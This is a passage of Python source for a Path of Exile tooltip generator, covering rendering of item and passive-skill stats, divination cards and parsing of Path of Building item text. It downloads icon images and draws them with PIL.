                stats.append(self.prop("Chance To Block: ", f"{item.block}%", PROP_COLOR))
            if item.armour:
                stats.append(self.prop("Armour: ", item.armour, PROP_COLOR))
            if item.evasion:
                stats.append(self.prop("Evasion: ", item.evasion, PROP_COLOR))
            if item.energy_shield:
                stats.append(self.prop("Energy Shield: ", item.energy_shield, PROP_COLOR))
            stats.append(separator)
        elif 'ring' in item.tags or 'amulet' in item.tags or 'belt' in item.tags:
            if item.quality:
                stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
            stats.append(separator)
        elif 'gem' in item.tags:
            stats.append(self.prop(item.gem_tags.replace(',', ', '), '', DESC_COLOR))
            if item.stats_per_level[0]['mana multiplier']:
                stats.append(self.prop("Mana Multiplier: ", f"{item.stats_per_level[0]['mana multiplier']}%", None))
            if item.radius:
                stats.append(self.prop("Radius: ", item.radius, None))
            if not item.is_aura:
                # Enlighten Enhance etc only go up to 10
                try:
                    stats.append(self.prop(
                        "Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[20]['mana cost']})", PROP_COLOR)
                    )
                except KeyError:
                    stats.append(self.prop(
                        "Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[10]['mana cost']})", PROP_COLOR)
                    )
            else:
                stats.append(self.prop("Mana Reserved: ", f"{item.stats_per_level[0]['mana cost']}%", None))
            # Enlighten Enhance etc only go up to 10
            try:
                if item.stats_per_level[20]['stored uses']:
                    # BUGFIX: was a set literal ``{...}``; the renderer
                    # concatenates ``stat.text`` with a string, so text
                    # must be a plain string.
                    stats.append(self.prop("Stored Uses", f"{item.stats_per_level[20]['stored uses']}", None))
            except KeyError:
                if item.stats_per_level[10]['stored uses']:
                    stats.append(self.prop("Stored Uses", f"{item.stats_per_level[10]['stored uses']}", None))
            if item.stats_per_level[0]['cooldown']:
                stats.append(self.prop("Cooldown Time: ", f"{item.stats_per_level[0]['cooldown']} sec", None))
            if item.cast_time:
                stats.append(self.prop("Cast Time: ", f"{item.cast_time} sec", None))
            if item.stats_per_level[0]['critical strike chance']:
                stats.append(
                    self.prop("Critical Strike Chance: ", f"{item.stats_per_level[0]['critical strike chance']}%", None)
                )
            if item.stats_per_level[0]['damage effectiveness']:
                stats.append(
                    self.prop("Damage Effectiveness: ", f"{item.stats_per_level[0]['damage effectiveness']}%", None)
                )
            stats.append(separator)
        elif item.base == 'Prophecy':
            # Prophecy lore is wrapped at 7 words per line.
            if len(item.lore.split(' ')) > 7:
                lore = item.lore.split(' ')
                sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
                for line in sep_lore:
                    stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
            else:
                stats.append(self.prop('Lore', item.lore, UNIQUE_COLOR))
            stats.append(separator)
            obj_list, matches = unescape_to_list(item.objective, ret_matches=True)
            if 'while holding' in obj_list[0]:
                item_name = matches[3].split('|')[1].strip(']]')
                pre_holding = obj_list[0].split(' while holding ')[0]
                new_obj = f"{pre_holding} while holding {item_name}"
            else:
                new_obj = obj_list[0]
            if len(new_obj.split(' ')) > 7:
                obj_split = new_obj.split(' ')
                obj_sep = [obj_split[x:x + 7] for x in range(0, len(obj_split), 7)]
                for line in obj_sep:
                    stats.append(self.prop(' '.join(line), '', None))
            else:
                stats.append(self.prop(new_obj, '', None))
            stats.append(separator)
            stats.append(self.prop("Seal Cost: ", item.seal_cost, DESC_COLOR))
        if item.requirements.has_reqs and item.base != "Prophecy":
            reqs = {}
            if item.requirements.level:
                reqs['level'] = item.requirements.level
            if item.requirements.str:
                reqs['str'] = item.requirements.str
            if item.requirements.dex:
                reqs['dex'] = item.requirements.dex
            if item.requirements.int:
                reqs['int'] = item.requirements.int
            stats.append(self.prop("Requires", reqs, None))
            stats.append(separator)
        try:
            if item.enchant:
                stats.append(self.prop(item.enchant, '', CRAFTED))
                stats.append(separator)
        except AttributeError:
            # Not all item types expose ``enchant``.
            pass
        if 'gem' in item.tags:
            if len(item.description.split(' ')) > 7:
                desc = item.description.split(' ')
                description = [desc[x:x + 7] for x in range(0, len(desc), 7)]
                for line in description:
                    stats.append(self.prop(' '.join(line), '', GEM_COLOR))
            else:
                stats.append(self.prop(item.description, '', GEM_COLOR))
            stats.append(separator)
            if item.quality_bonus:
                stats.append(self.prop("Per 1% Quality:", "", DESC_COLOR))
                if '<br>' in item.quality_bonus:
                    for bonus in item.quality_bonus.split('<br>'):
                        stats.append(self.prop(bonus, "", PROP_COLOR))
                else:
                    stats.append(self.prop(item.quality_bonus, "", PROP_COLOR))
                stats.append(separator)
            stat_text = item.stat_text.split("<br>")
            for stat in stat_text:
                if len(stat.split(' ')) > 7:
                    st = stat.split(' ')
                    sep_stat = [st[x:x + 7] for x in range(0, len(st), 7)]
                    for sep in sep_stat:
                        stats.append(self.prop(' '.join(sep), "", PROP_COLOR))
                else:
                    stats.append(self.prop(stat, "", PROP_COLOR))
            stats.append(separator)
            stats.append(self.prop("Gem Help", "Place into an item socket of the right", DESC_COLOR))
            stats.append(self.prop("Gem Help", "colour to gain this skill. Right click to", DESC_COLOR))
            stats.append(self.prop("Gem Help", "remove from a socket.", DESC_COLOR))
        if 'gem' not in item.tags and item.base != "Prophecy":
            if item.implicits:
                implicits = unescape_to_list(item.implicits)
            else:
                implicits = None
            if item.explicits:
                explicits = unescape_to_list(item.explicits)
            else:
                explicits = None
            # A leading "{...}" explicit is actually an implicit (PoB quirk).
            if explicits and explicits[0].startswith('{'):
                implicits = [explicits[0]]
                explicits.pop(0)
            if implicits:
                for implicit in implicits:
                    stats.append(self.prop(implicit, '', PROP_COLOR))
                stats.append(separator)
            if explicits:
                for explicit in explicits:
                    if explicit in item.lore:
                        continue
                    if explicit.lower() == "corrupted":
                        stats.append(self.prop(explicit, '', CORRUPTED))
                    elif "(crafted)" in explicit or "{crafted}" in explicit:
                        stats.append(
                            self.prop(explicit.replace('{crafted}', '').replace(' (crafted)', ''), '', CRAFTED)
                        )
                    else:
                        stats.append(self.prop(explicit, '', PROP_COLOR))
            if item.lore:
                if stats[-1] is not separator:
                    stats.append(separator)
                lore = self.prop('Lore', unescape_to_list(item.lore), UNIQUE_COLOR)
                stats.append(lore)
        if item.icon:
            http = urllib3.PoolManager()

            def ico(icon):
                # Download the icon and normalize it to RGBA.
                r = http.request('GET', icon, preload_content=False)
                im = Image.open(BytesIO(r.read()))
                im = im.convert('RGBA')
                return im
            try:
                if item.skill_icon:
                    stats.append(self.prop('Image', ico(item.skill_icon), None))
            except AttributeError:
                # ``skill_icon`` only exists on some item types.
                pass
            stats.append(self.prop('Image', ico(item.icon), None))
    else:
        # Passive skill tree node.
        if item.name:
            stats.append(self.prop('', item.name, DESC_COLOR))
        passive_type = None
        if item.asc_class:
            passive_type = f"{item.asc_class} Notable Passive Skill"
        elif item.is_notable:
            passive_type = "Notable Passive Skill"
        elif item.is_keystone:
            passive_type = "Keystone"
        stats.append(self.prop(passive_type, '', NORMAL_COLOR))
        for line in unescape_to_list(item.stat_text):
            stats.append(self.prop(line, '', PROP_COLOR))
        if item.icon:
            http = urllib3.PoolManager()

            def ico(icon):
                # Download the icon and normalize it to RGBA.
                r = http.request('GET', icon, preload_content=False)
                im = Image.open(BytesIO(r.read()))
                im = im.convert('RGBA')
                return im
            try:
                # ``skill_icon`` may be absent; AttributeError is expected.
                if item.skill_icon:
                    stats.append(self.prop('Image', ico(item.skill_icon), None))
            except AttributeError:
                pass
            stats.append(self.prop('Image', ico(item.icon), None))
    if item.reminder_text:
        lines = unescape_to_list(item.reminder_text)
        for line in lines:
            if len(line.split(' ')) > 7:
                lore = line.split(' ')
                sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
                for set_line in sep_lore:
                    stats.append(self.prop('Reminder', ' '.join(set_line), DESC_COLOR))
            else:
                stats.append(self.prop("Reminder", line, DESC_COLOR))
    if item.flavor_text:
        if len(item.flavor_text.split(' ')) > 7:
            lore = item.flavor_text.split(' ')
            sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
            for line in sep_lore:
                stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
        else:
            stats.append(self.prop("Lore", item.flavor_text, UNIQUE_COLOR))
    return stats
def render_divcard(self, card):
    """Render a divination card as a PIL image.

    Downloads the card art, composites it under the card frame, then
    draws the name, stack size, reward line, optional "Corrupted" tag
    and the word-wrapped flavor lore.

    :param card: a card object exposing ``card_art``, ``name``,
        ``stack_size``, ``reward``, ``reward_flavor``, ``is_corrupted``
        and ``lore``.
    :return: the finished RGBA image.
    """
    http = urllib3.PoolManager()
    r = http.request('GET', card.card_art, preload_content=False)
    art = Image.open(BytesIO(r.read()))
    art = art.convert('RGBA')
    item = Image.new('RGBA', self.div_frame.size, (255, 0, 0, 0))
    cur = Cursor(self.div_frame.size[0] // 2)
    cur.reset_x()
    cur.move_x((art.size[0] // 2) * -1)
    cur.move_y(47)
    item.alpha_composite(art, cur.pos)
    item.alpha_composite(self.div_frame, (0, 0))
    cur.reset_x()
    d = ImageDraw.Draw(item)
    cur.y = 0
    cur.move_y(20)
    header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
    cur.move_x((header_font.getsize(card.name)[0] // 2) * -1)
    d.text(cur.pos, card.name, fill='black', font=header_font)
    cur.reset_x()
    cur.x = 77
    cur.y = 316
    cur.move_x((self.font.getsize(card.stack_size)[0] // 2) * -1)
    d.text(cur.pos, card.stack_size, fill=None, font=self.font)
    cur.y = 384
    cur.reset_x()
    fill = flavor_color[card.reward_flavor]
    cur.move_x((self.font.getsize(card.reward)[0] // 2) * -1)
    d.text(cur.pos, card.reward, fill=fill, font=self.font)
    cur.reset_x()
    if card.is_corrupted:
        cur.y = 384 + self.font.getsize(card.reward)[1] + 6
        cur.move_x((self.font.getsize("Corrupted")[0] // 2) * -1)
        d.text(cur.pos, "Corrupted", fill=CORRUPTED, font=self.font)
        cur.reset_x()
    cur.y = 536
    first_lore = unescape_to_list(card.lore)
    for first_line in first_lore:
        text = first_line
        # Wrap lore at 7 words per drawn line.
        if len(text.split(' ')) > 7:
            lore = text.split(' ')
            sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
            for line in sep_lore:
                joined_line = ' '.join(line)
                cur.move_y(STAT_SPACING)
                # BUGFIX: measure with the same font the text is drawn
                # with (lore_font), otherwise centering is off.
                cur.move_x((self.lore_font.getsize(joined_line)[0] // 2) * -1)
                d.text(cur.pos, joined_line, fill=UNIQUE_COLOR, font=self.lore_font)
                cur.move_y(self.lore_font.getsize(joined_line)[1])
                cur.reset_x()
        else:
            cur.move_y(STAT_SPACING)
            # BUGFIX: measure with lore_font (see above).
            cur.move_x((self.lore_font.getsize(text)[0] // 2) * -1)
            d.text(cur.pos, text, fill=UNIQUE_COLOR, font=self.lore_font)
            cur.move_y(self.lore_font.getsize(text)[1])
            cur.reset_x()
    return item
def render(self, poe_item):
    """Render *poe_item* into a finished PIL tooltip image.

    Sorts the item's display lines via ``sort_stats``, sizes the canvas
    via ``calc_size``, draws the name bar / header, then draws each stat
    line using the same branch structure ``calc_size`` measured with.
    Returns the image with a 1px flavor-colored border.
    """
    stats = self.sort_stats(poe_item)
    fill = flavor_color[self.flavor]
    # Use the wider of name/base as the header; fall back to the name when
    # base is missing or not comparable (passives, prophecies, gems).
    try:
        if self.header_font.getsize(poe_item.name) > self.header_font.getsize(poe_item.base):
            header = poe_item.name
        else:
            header = poe_item.base
    except (AttributeError, TypeError):
        header = poe_item.name
    box_size = self.calc_size(stats, header)
    center_x = box_size[0] // 2
    item = Image.new('RGBA', box_size, color='black')
    cur = Cursor(center_x)
    if not isinstance(poe_item, PassiveSkill):
        # Stamp influence badges (shaper/elder/conqueror) onto the name bar;
        # rare+ rarities use a taller bar, hence different badge offsets.
        try:
            if poe_item.influences:
                apply_influences = []
                for influence in poe_item.influences:
                    if influence == "shaper":
                        apply_influences.append(self.shaper_badge)
                    elif influence == "elder":
                        apply_influences.append(self.elder_badge)
                    elif influence == "redeemer":
                        apply_influences.append(self.redeemer_badge)
                    elif influence == "crusader":
                        apply_influences.append(self.crusader_badge)
                    elif influence == "hunter":
                        apply_influences.append(self.hunter_badge)
                    elif influence == "warlord":
                        apply_influences.append(self.warlord_badge)
                if poe_item.rarity.lower() in ['rare', 'unique', 'relic']:
                    self.namebar_left.alpha_composite(apply_influences[0], (8, 18))
                    if len(apply_influences) > 1:
                        self.namebar_right.alpha_composite(apply_influences[1], (9, 18))
                    else:
                        self.namebar_right.alpha_composite(apply_influences[0], (9, 18))
                else:
                    self.namebar_left.alpha_composite(apply_influences[0], (4, 6))
                    if len(apply_influences) > 1:
                        self.namebar_right.alpha_composite(apply_influences[1], (1, 6))
                    else:
                        self.namebar_right.alpha_composite(apply_influences[0], (1, 6))
        except AttributeError:
            # Item types without an ``influences`` attribute just skip badges.
            pass
        # Paste left cap, stretched middle, right cap of the name bar.
        item.paste(self.namebar_left, cur.pos)
        cur.move_x(self.namebar_left.size[0])
        transformed_namebar = self.namebar_trans.resize((item.size[0] - (self.namebar_left.size[0] * 2),
                                                         self.namebar_trans.size[1]))
        item.paste(transformed_namebar, cur.pos)
        cur.move_x(transformed_namebar.size[0])
        item.paste(self.namebar_right, cur.pos)
        cur.reset_x()
    d = ImageDraw.Draw(item)
    cur.move_y(8)
    cur.move_x((self.header_font.getsize(poe_item.name)[0] // 2) * -1)
    d.text(cur.pos, poe_item.name, fill=fill, font=self.header_font)
    if not isinstance(poe_item, PassiveSkill):
        cur.move_y(2 + self.header_font.getsize(poe_item.name)[1])
    else:
        cur.move_y(self.header_font.getsize(poe_item.name)[1] // 2)
    cur.reset_x()
    if not isinstance(poe_item, PassiveSkill):
        if 'gem' not in poe_item.tags and poe_item.base != "Prophecy":
            if poe_item.base not in poe_item.name:
                cur.move_x((self.header_font.getsize(poe_item.base)[0] // 2) * -1)
                d.text(cur.pos, poe_item.base, fill=fill, font=self.header_font)
                cur.reset_x()
            cur.y = 0
            # FIXME: referenced before assignment
            # NOTE(review): ``transformed_namebar`` is only bound in the
            # non-PassiveSkill block above; this path is also guarded by
            # non-PassiveSkill, so the warning looks like a false positive
            # at runtime — confirm.
            cur.move_y(transformed_namebar.size[1])
        else:
            pass
    for stat in stats:
        if stat.title == "Separator":
            self.last_action = "Separator"
            cur.move_x((self.separator.size[0] // 2) * -1)
            cur.move_y(SEPARATOR_SPACING + 2)
            item.paste(self.separator, cur.pos)
            cur.reset_x()
        elif stat.title == "Elemental Damage:":
            # Center on the full "title + values" string, then draw each
            # element's value in its own color.
            stat_text = stat.title
            for element in stat.text.keys():
                stat_text += f" {stat.text[element]}"
            cur.move_x((self.font.getsize(stat_text)[0] // 2) * -1)
            cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
            d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
            cur.move_x(self.font.getsize(stat.title)[0])
            for element in stat.text.keys():
                d.text(cur.pos, f" {stat.text[element]}", fill=ELE_COLOR[element], font=self.font)
                cur.move_x(self.font.getsize(f" {stat.text[element]}")[0])
            cur.move_y(STAT_HEIGHT)
            cur.reset_x()
            self.last_action = ""
        elif stat.title == "Requires":
            # Pre-build the full line to center it, then draw attribute
            # names in DESC_COLOR and values in the default color.
            text = stat.title
            for attr in stat.text.keys():
                text += f" {attr.title()} {stat.text[attr]}" \
                        f"{'' if list(stat.text.keys())[-1] == attr else ','}"
            cur.move_y(0 if self.last_action == "Separator" else STAT_SPACING)
            cur.move_x((self.font.getsize(text)[0] // 2) * -1)
            d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
            cur.move_x(self.font.getsize(stat.title)[0])
            for attr in stat.text.keys():
                if attr == 'level':
                    # "Level" label first, then the value.
                    d.text(cur.pos, f" {attr.title()}", fill=DESC_COLOR, font=self.font)
                    cur.move_x(self.font.getsize(f" {attr.title()}")[0])
                    attribute_final = f" {stat.text[attr]}" \
                                      f"{'' if list(stat.text.keys())[-1] == attr else ','}"
                    d.text(cur.pos, attribute_final, font=self.font)
                else:
                    # Value first, then the attribute name (e.g. "32 Str,").
                    d.text(cur.pos, f" {stat.text[attr]}", font=self.font)
                    cur.move_x(self.font.getsize(f" {stat.text[attr]}")[0])
                    attribute_final = f" {attr.title()}{'' if list(stat.text.keys())[-1] == attr else ','}"
                    d.text(cur.pos, attribute_final, font=self.font, fill=DESC_COLOR)
                cur.move_x(self.font.getsize(attribute_final)[0])
            cur.move_y(STAT_HEIGHT)
            cur.reset_x()
            self.last_action = ""
        elif stat.title == "Lore" or stat.title == "Reminder":
            if type(stat.text) is list:
                for line in stat.text:
                    text = line
                    cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
                    cur.move_x((self.font.getsize(text)[0] // 2) * -1)
                    d.text(cur.pos, text, fill=stat.color, font=self.lore_font)
                    cur.move_y(self.lore_font.getsize(text)[1])
                    cur.reset_x()
                    self.last_action = ""
            else:
                cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
                cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
                d.text(cur.pos, stat.text, fill=stat.color, font=self.lore_font)
                cur.move_y(STAT_HEIGHT)
                cur.reset_x()
        elif stat.title == "Image" and not isinstance(poe_item, PassiveSkill):
            cur.move_x((stat.text.size[0] // 2) * -1)
            cur.move_y(4)
            ic = stat.text
            # Overlay shaper/elder icon backgrounds for influenced items.
            if not isinstance(poe_item, Gem) and 'shaper' in poe_item.influences:
                ic = Image.alpha_composite(self.shaper_backgrounds[poe_item.size].resize(ic.size), ic)
            if not isinstance(poe_item, Gem) and 'elder' in poe_item.influences:
                ic = Image.alpha_composite(self.elder_backgrounds[poe_item.size].resize(ic.size), ic)
            item.alpha_composite(ic, cur.pos)
            cur.move_y(stat.text.size[1])
            cur.reset_x()
        elif stat.title == "Image" and isinstance(poe_item, PassiveSkill):
            ic = stat.text
            # Pick the node frame matching the passive type.
            if poe_item.asc_class:
                frame = self.ascendancy_frame
            elif poe_item.is_keystone:
                frame = self.keystone_frame
            elif poe_item.is_notable:
                frame = self.notable_frame
            else:
                frame = self.passive_frame
            # Shrink the icon so it fits inside the circular frame
            # (side of the square inscribed in the frame circle).
            icl = round(math.sqrt((frame.size[0] ** 2) / 2))
            old_s = ic.size[0]
            ic = ic.resize((icl, icl))
            cur.move_x((ic.size[0] // 2) * -1)
            cur.move_y(30)
            item.alpha_composite(ic, cur.pos)
            cur.move_y(((old_s + 26 - ic.size[0]) // 2) * -1)
            cur.reset_x()
            cur.move_x((frame.size[0] // 2) * -1)
            item.alpha_composite(frame, cur.pos)
            cur.move_y(frame.size[1])
            cur.reset_x()
        elif stat.title == "Stored Uses":
            # assumes stat.text is a string — TODO confirm upstream.
            text = f"Can Store {stat.text} Use(s)"
            cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
            cur.move_x((self.font.getsize(text)[0] // 2) * -1)
            d.text(cur.pos, "Can Store ", fill=DESC_COLOR, font=self.font)
            cur.move_x(self.font.getsize("Can Store ")[0])
            d.text(cur.pos, stat.text + " ", font=self.font)
            cur.move_x(self.font.getsize(stat.text + " ")[0])
            d.text(cur.pos, "Use(s)", fill=DESC_COLOR, font=self.font)
            cur.reset_x()
        elif stat.title == "Gem Help":
            cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
            cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
            d.text(cur.pos, stat.text, fill=DESC_COLOR, font=self.lore_font)
            cur.move_y(STAT_HEIGHT)
            cur.reset_x()
        elif stat.title == "Seal Cost: ":
            # "Seal Cost:" heading, then "<N>X <coin image> Silver Coin".
            coin = Image.open(f'{_dir}//silver_coin.png').convert('RGBA')
            cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
            cur.move_x((self.font.getsize(stat.title)[0] // 2) * -1)
            d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
            cur.move_y(STAT_HEIGHT + STAT_SPACING)
            cur.reset_x()
            sealtext = f"{stat.text}X Silver Coin"
            cur.move_x((self.font.getsize(sealtext)[0] // 2) * -1)
            d.text(cur.pos, f"{stat.text}X ", fill=NORMAL_COLOR, font=self.font)
            cur.move_x(self.font.getsize(f"{stat.text}X ")[0])
            item.alpha_composite(coin, cur.pos)
            cur.move_x(coin.size[0] + 2)
            d.text(cur.pos, "Silver Coin", fill=NORMAL_COLOR, font=self.font)
            cur.move_y(STAT_HEIGHT)
            cur.reset_x()
        else:
            # Generic "Title: value" or plain mod line.
            text = f"{stat.title}{stat.text}"
            cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
            cur.move_x((self.font.getsize(text)[0] // 2) * -1)
            if ':' in stat.title:
                d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
                cur.move_x(self.font.getsize(stat.title)[0])
                d.text(cur.pos, str(stat.text), fill=stat.color, font=self.font)
            else:
                # "{...}"-prefixed lines are crafted mods.
                if stat.title.startswith('{'):
                    color = CRAFTED
                else:
                    color = stat.color
                d.text(cur.pos, stat.title, fill=color, font=self.font)
            cur.move_y(STAT_HEIGHT)
            cur.reset_x()
            self.last_action = ""
    item = ImageOps.expand(item, border=1, fill=fill)
    return item
def parse_pob_item(itemtext):
    """Parse a Path of Building / in-game item copy-paste into a dict.

    Handles both the in-game clipboard format (sections delimited by
    "--------" with an "Item Level" line) and PoB's export format
    ("Implicits: N"), resolving ``{variant: ...}`` and ``{range: ...}``
    annotations along the way.

    :param itemtext: raw multi-line item text.
    :return: dict with ``name``, ``base``, ``stats``, ``rarity``,
        ``implicits``, ``quality``, ``special`` and ``enchant`` keys.
    """
    item = itemtext.split('\n')
    qualtext = 0
    variant = None
    pobitem = {'special': [], 'enchant': "", 'type': None}
    # NOTE(review): this loop pops from ``item`` while enumerating it, so a
    # line directly after a removed variant line is skipped — confirm intended.
    for index, line in enumerate(item):
        if "{variant:" in line:
            variant_now = line[line.index("t:") + 2:line.index("}")].split(',')
            if variant not in variant_now:
                item.pop(index)
                continue
            line = item[index] = line.split("}", 1)[1]
        if "{range:" in line:
            # Default to the top of the roll range when the annotation fails
            # to parse (previously ``percent`` could be unbound here — the
            # old "referenced before assignment" FIXME).
            percent = 1.0
            try:
                percent = float(line[line.index("e:") + 2:line.index("}")])
            except Exception:
                pass
            txt = line.split("}")[1]
            matches = re_range.findall(txt)
            for match in matches:
                stat = match[1:-1]
                if " to " in stat:
                    separator = stat.find(' to ', 1)
                    range_end = stat[separator + 4:]
                else:
                    separator = stat.find('-', 1)
                    range_end = stat[separator + 1:]
                range_start = stat[:separator]
                if '.' in range_start or '.' in range_end:
                    calc_stat = float(percent * float(range_end))
                else:
                    calc_stat = int(percent * float(range_end))
                txt = txt.replace(match, str(calc_stat))
            item[index] = txt
        if line.startswith("Rarity"):
            pobitem['rarity'] = line.split(' ')[1].title()
            pobitem['rarity_index'] = index
            continue
        elif line.startswith("Selected Variant"):
            variant = line.split(": ")[1]
            continue
        elif line.startswith("Item Level"):
            # In-game clipboard format: work out where the mods start,
            # counting an optional enchant line and any implicit lines.
            pobitem['type'] = "game"
            if item[index + 3].startswith('--'):
                offset = 2
                if "(implicit)" not in item[index + offset]:
                    pobitem['enchant'] = item[index + offset]
                    offset = 4
                if "(implicit)" in item[index + offset]:
                    pobitem['implicits'] = 0
                    for line_inner in item[index + offset:]:
                        if "(implicit)" in line_inner:
                            pobitem['implicits'] = pobitem['implicits'] + 1
                        if "---" in line_inner:
                            break
                    pobitem['statstart_index'] = index + offset + pobitem['implicits']
                else:
                    pobitem['statstart_index'] = index + offset
            else:
                pobitem['statstart_index'] = index + 2
        elif line.startswith("====="):
            pobitem['statstart_index'] = index
        elif line.startswith("Implicits:") and 'implicits' not in pobitem:
            # PoB export format declares the implicit count explicitly.
            pobitem['type'] = 'pob'
            pobitem['implicits'] = int(line.split(': ')[1])
            pobitem['statstart_index'] = index + pobitem['implicits']
        elif line.startswith("Requires"):
            pobitem['statstart_index'] = index
        elif line.startswith("Quality"):
            try:
                qualtext = line.split("+")[1].split(' ')[0].strip('%')
            except IndexError:
                pass
        if "Shaper Item" in line:
            pobitem['special'].append("Shaper Item")
        if "Elder Item" in line:
            pobitem['special'].append("Elder Item")
        if "Crusader Item" in line:
            pobitem['special'].append("Crusader Item")
        if "Redeemer Item" in line:
            pobitem['special'].append("Redeemer Item")
        if "Warlord Item" in line:
            pobitem['special'].append("Warlord Item")
        if "Hunter Item" in line:
            pobitem['special'].append("Hunter Item")
    # Name/base resolution depends on rarity: rares and uniques carry both
    # lines, magic items derive the base from the name.
    if pobitem['rarity'].lower() in ['unique', 'rare', 'relic']:
        name = item[pobitem['rarity_index'] + 1]
        base = item[pobitem['rarity_index'] + 2]
    elif pobitem['rarity'].lower() == 'magic':
        name = item[pobitem['rarity_index'] + 1]
        if "Superior" in name:
            name = name.replace("Superior", "").strip()
        base = get_base_from_magic(name)
    else:
        name = item[pobitem['rarity_index'] + 1]
        if "Superior" in name:
            name = name.replace("Superior", "").strip()
        base = name
    if 'implicits' in pobitem and pobitem['implicits']:
        if pobitem['type'] == 'game':
            offset = 0
        else:
            offset = 1
        implicits = item[:pobitem['statstart_index'] + offset][-1 * pobitem['implicits']:]
        implicits = [implicit.replace('(implicit)', '') for implicit in implicits]
    elif item[pobitem['statstart_index'] - 2].startswith('--') and 'Item Level' not in item[pobitem['statstart_index'] - 1]:
        # No declared implicit count: scan forward to the next separator.
        imp_end = "None"
        for ind, stat in enumerate(item[pobitem['statstart_index'] - 1:]):
            if stat.startswith('--'):
                if item[pobitem['statstart_index'] - 1:][ind + 1] not in ['Shaper Item', 'Elder Item']:
                    imp_end = ind - 1
                    break
        if imp_end != "None":
            implicits = item[pobitem['statstart_index'] - 1:][0:imp_end]
        else:
            implicits = []
    else:
        implicits = []
    stat_text = item[pobitem['statstart_index'] + 1:]
    stat_text = [stat for stat in stat_text if not stat.startswith('--')]
    # Strip trailing "(...)" qualifiers and the "Synthesised" prefix.
    if '(' in base and ')' in base:
        base = base[:base.find('(') - 1]
    if "Synthesised" in base:
        base = base.replace("Synthesised", "").strip()
    if "Synthesised" in name:
        name = name.replace("Synthesised", "").strip()
    return {
        'name': name, 'base': base, 'stats': stat_text, 'rarity': pobitem['rarity'],
        'implicits': implicits, 'quality': int(qualtext), 'special': pobitem['special'],
        'enchant': pobitem['enchant']
    }
def ensure_rangeless(stat):
    """Collapse a "(low-high)" roll-range value to its low bound.

    A value whose string form contains a dash is assumed to look like
    ``"(10-20)"``: the text before the dash, minus its leading
    parenthesis, is returned.  Anything else passes through untouched.
    """
    if "-" not in str(stat):
        return stat
    low_part = stat.split('-')[0]
    return low_part[1:]
def modify_base_stats(item):
    """Fold an item's implicit and explicit modifier lines into its base
    combat stats, mutating *item* in place.

    Local (non-global, non-minion) flat and %-increased modifiers are
    accumulated into a scratch dict, then applied either to the weapon
    damage/speed/crit/range attributes or to the armour/evasion/energy
    shield/block attributes, depending on the item's tags.
    """
    stats = {
        'flat es': 0, 'flat armour': 0, 'flat evasion': 0, 'inc es': int(item.quality),
        'inc armour': int(item.quality), 'inc evasion': int(item.quality), 'aspd': 0,
        'fire low': 0, 'fire max': 0, 'fire inc': 0, 'cold low': 0, 'cold max': 0,
        'cold inc': 0, 'light low': 0, 'light max': 0, 'light inc': 0, 'chaos low': 0,
        'chaos max': 0, 'chaos inc': 0, 'phys low': 0, 'phys max': 0, 'phys inc': int(item.quality),
        'cc': 0, 'range': 0, 'block': 0
    }

    def _accumulate(stat_line):
        # Parse a single modifier line and add its local contribution to
        # ``stats``.  (This logic was previously duplicated verbatim for
        # implicits and explicits; it is now shared.)
        text = stat_line.lower().replace('{crafted}', '').replace('{fractured}', '')
        # Skip lines without numbers and non-local (minion/global) mods.
        if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
            return
        # Skip conditional/compound mods.
        if ' per ' in text or ' if ' in text or ',' in text:
            return
        if " to " in text and "multiplier" not in text:
            # Flat "+X to Y" style modifiers.
            if 'armour' in text and isinstance(item, Armour):
                stats['flat armour'] += int(text.split(' ')[0][1:])
            elif 'evasion rating' in text and isinstance(item, Armour):
                stats['flat evasion'] += int(text.split(' ')[0][1:])
            elif 'maximum energy shield' in text and isinstance(item, Armour):
                stats['flat es'] += int(text.split(' ')[0][1:])
            elif 'weapon range' in text and isinstance(item, Weapon):
                stats['range'] += int(text.split(' ')[0][1:])
            elif 'block' in text and 'spell damage' not in text and 'block recovery' not in text:
                stats['block'] += int(text.split(' ')[0][:-1])
            if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
                # "Adds X to Y <element> damage" — pick the element bucket.
                k = None
                if 'lightning' in text:
                    k = 'light'
                if 'cold' in text:
                    k = 'cold'
                if 'fire' in text:
                    k = 'fire'
                if 'chaos' in text:
                    k = 'chaos'
                if 'physical' in text:
                    k = 'phys'
                if k:
                    stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
                    stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
        elif " increased " in text:
            # Percentage "X% increased Y" modifiers.
            if "armour" in text and isinstance(item, Armour):
                stats['inc armour'] += int(text.split(' ')[0][:-1])
            if "evasion rating" in text and isinstance(item, Armour):
                stats['inc evasion'] += int(text.split(' ')[0][:-1])
            if "energy shield" in text and isinstance(item, Armour):
                stats['inc es'] += int(text.split(' ')[0][:-1])
            elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
                stats['block'] += int(text.split(' ')[0][:-1])
            if "attack speed" in text and isinstance(item, Weapon):
                stats['aspd'] += int(text.split(' ')[0][:-1])
